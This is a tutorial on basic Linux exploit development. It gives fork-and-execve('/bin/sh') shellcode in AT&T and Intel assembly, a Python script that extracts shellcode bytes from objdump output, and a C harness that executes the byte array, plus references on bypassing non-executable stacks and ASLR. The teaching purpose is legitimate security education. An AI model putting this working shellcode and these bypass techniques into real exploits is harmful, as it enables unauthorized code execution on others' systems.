Basic knowledge of exploit on linux

Source: Internet
Author: User

Shellcode on Linux differs slightly from shellcode on Windows: Linux shellcode does its work by invoking the kernel directly through system calls. The system call numbers can be viewed with cat /usr/src/linux-2.6.38.8/arch/x86/include/asm/unistd_32.h; small kernel version changes do not renumber the system calls, so these numbers can be relied on:

#define __NR_restart_syscall      0
#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
#define __NR_link                 9
#define __NR_unlink              10
#define __NR_execve              11
.....

Linux shellcode can be written in either Intel or AT&T syntax; the resulting machine code is the same (both are the x86 instruction set) and the linker is the same, but the assembler differs. One of the biggest differences between GAS and NASM is the syntax: GAS uses AT&T syntax, a fairly old syntax used by GAS and some older assemblers, while NASM uses Intel syntax, which most assemblers support, including TASM and MASM. You therefore cannot assemble an AT&T syntax file with nasm, and vice versa.

========================================================
Use AT&T syntax
.global _start
_start:
        xor  %eax,%eax
        or   $2,%eax        # __NR_fork
        int  $0x80
        test %eax,%eax
        jnz  next           # nonzero return (parent): go and exec the shell
        ret                 # zero return (child): return to the caller
next:
        xor  %eax,%eax
        push %eax           # NUL terminator for the path string
        #push $0x68736162   # /bin/bash ("bash")
        #push $0x2f2f2f2f   # "////"
        #push $0x6e69622f   # "/bin"
        push $0x68732f6e    # /bin/sh: "n/sh"
        push $0x69622f2f    # "//bi"  -> "//bin/sh" on the stack
        mov  %esp,%ebx      # param1: path
        push %eax           # argv[1] = NULL
        push %ebx           # argv[0] = path
        mov  %esp,%ecx      # param2: argv
        mov  %eax,%edx      # param3: envp = NULL
        or   $0xb,%eax      # __NR_execve
        int  $0x80

Assemble with GAS: as -o hello.o hello.s. To keep a symbol table for debugging, add the assembler's debug-info option, e.g. as --gstabs -o hello.o hello.s. Link with ld -o hello hello.o; adding -s to the ld command strips the symbols, and -static links statically. Here static linking leaves the size unchanged, because the assembly code references no other library.

========================================================
Use Intel syntax
global _start
_start:
    xor  eax, eax
    or   eax, 2          ; fork
    int  0x80
    test eax, eax
    jnz  next            ; nonzero return (parent): go and exec the shell
    ret                  ; zero return (child): return to the caller
next:
    xor  eax, eax
    push eax             ; NUL terminator for the path string
    ; push 0x68736162    ; /bin/bash ("bash")
    ; push 0x2f2f2f2f    ; "////"
    ; push 0x6e69622f    ; "/bin"
    push 0x68732f6e      ; /bin/sh: "n/sh"
    push 0x69622f2f      ; "//bi"  -> "//bin/sh" on the stack
    mov  ebx, esp        ; param1: path
    push eax             ; argv[1] = NULL
    push ebx             ; argv[0] = path
    mov  ecx, esp        ; param2: argv
    mov  edx, eax        ; param3: envp = NULL
    or   eax, 0xb        ; execve
    int  0x80

Assemble with nasm: nasm -g -f elf hello.asm -o hello.o, then link with ld -o hello hello.o.

The two listings above will not go into the details of the syntax gap. A few points to note: the comment characters differ (# versus ;) and the constants differ (AT&T prefixes immediates with $). In short, AT&T syntax looks rather strange.

==========================================================
After assembling, the disassembler objdump is used to disassemble the binary and extract the shellcode bytes: objdump --disassemble ./hello, or the short form objdump -d hello. objdump must first identify the file format; for pure binary code such as a boot sector, disassembly fails with an error like "objdump: read_1_track.boot.o: file format not recognized". ndisasm does not need to recognise the file format: ndisasm -b 32 -e 0x74 hello | head -n 15, where -e is the offset at which disassembly starts. The disassembly output includes the byte codes, but if the shellcode is long it is still a little troublesome to copy them by hand, so I wrote a small Python script to generate the array.


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: SAI
# Extract the bytes from "objdump -d <elf>" and print them as a C char array.
import os
import sys

if len(sys.argv) != 2:
    print('%s shellcode_elfbin' % sys.argv[0])
    sys.exit(0)

cmdline = 'objdump -d ' + sys.argv[1]
print(cmdline)
rl = os.popen(cmdline).readlines()
shellcode = ''
for i in rl:
    # instruction lines look like "  8048054:<TAB>31 c0   <TAB>xor %eax,%eax"
    cl = i.split('\t')
    if len(cl) == 3:
        sl = cl[1].split(' ')
        for code in sl:
            if code != '':
                s = '\\x' + code
                shellcode += s
print('char shellcode[]="%s";' % shellcode)
print('shellcode size:%d' % (len(shellcode) // 4))   # 4 characters per "\xNN"
if shellcode.find('00') != -1:
    print('0x00 is in shellcode')

Sometimes shellcode obtained from the Internet needs to be tested; a C program can be written for that.

#include <stdio.h>
#include <string.h>

/* fork + execve("//bin/sh") shellcode from the listings above */
char shellcode[] = "\x31\xc0\x83\xc8\x02\xcd\x80\x85\xc0\x75\x01\xc3\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\x83\xc8\x0b\xcd\x80";

int main()
{
    /* call the byte array as a function; on current systems the data
       segment must be executable for this to work (e.g. link with -z execstack) */
    (*(void (*)()) shellcode)();
    printf("size:%d\n", (int) sizeof(shellcode));
    return 0;
}

Compile with g++ -g test.cpp -o test. The program can then be debugged in gdb, single-stepping (si) through the shellcode to observe what it does.

======================================================
Information on exploits of Linux vulnerabilities: early articles on bypassing DEP on Linux include warning3's "Method of bypassing Linux non-executable stack protection" and axis's "Bypass Exec-shield Under Redhat". The main idea is return-to-libc (including overwriting the GOT). However, because the libraries differ from system to system, the address of the libc function being returned to differs as well, so this method is not well suited to real attacks, let alone with ASLR. For bypassing ASLR, see the article on bypassing ASLR and the non-executable stack on Linux 2.6.17/20; before 2.6.17 the main idea was that linux-gate.so was not randomised, but this was fixed after 2.6.20. The xfocus article "Breaking through ASLR protection and compiler stack protection" uses environment variables to deal with random addresses, but can environment variables actually be passed to the program in a real attack? For more information about the heap, see HEAP/BSS overflow. In addition, the book "Buffer Overflow Attack: Detection, Analysis and Prevention" gives a good explanation of Linux shellcode (the other parts are general and not worth buying the book for). For writing shellcode, also refer to shunx's [Science] Shellcode article: http://www.xfocus.net/articles/200805/980.html
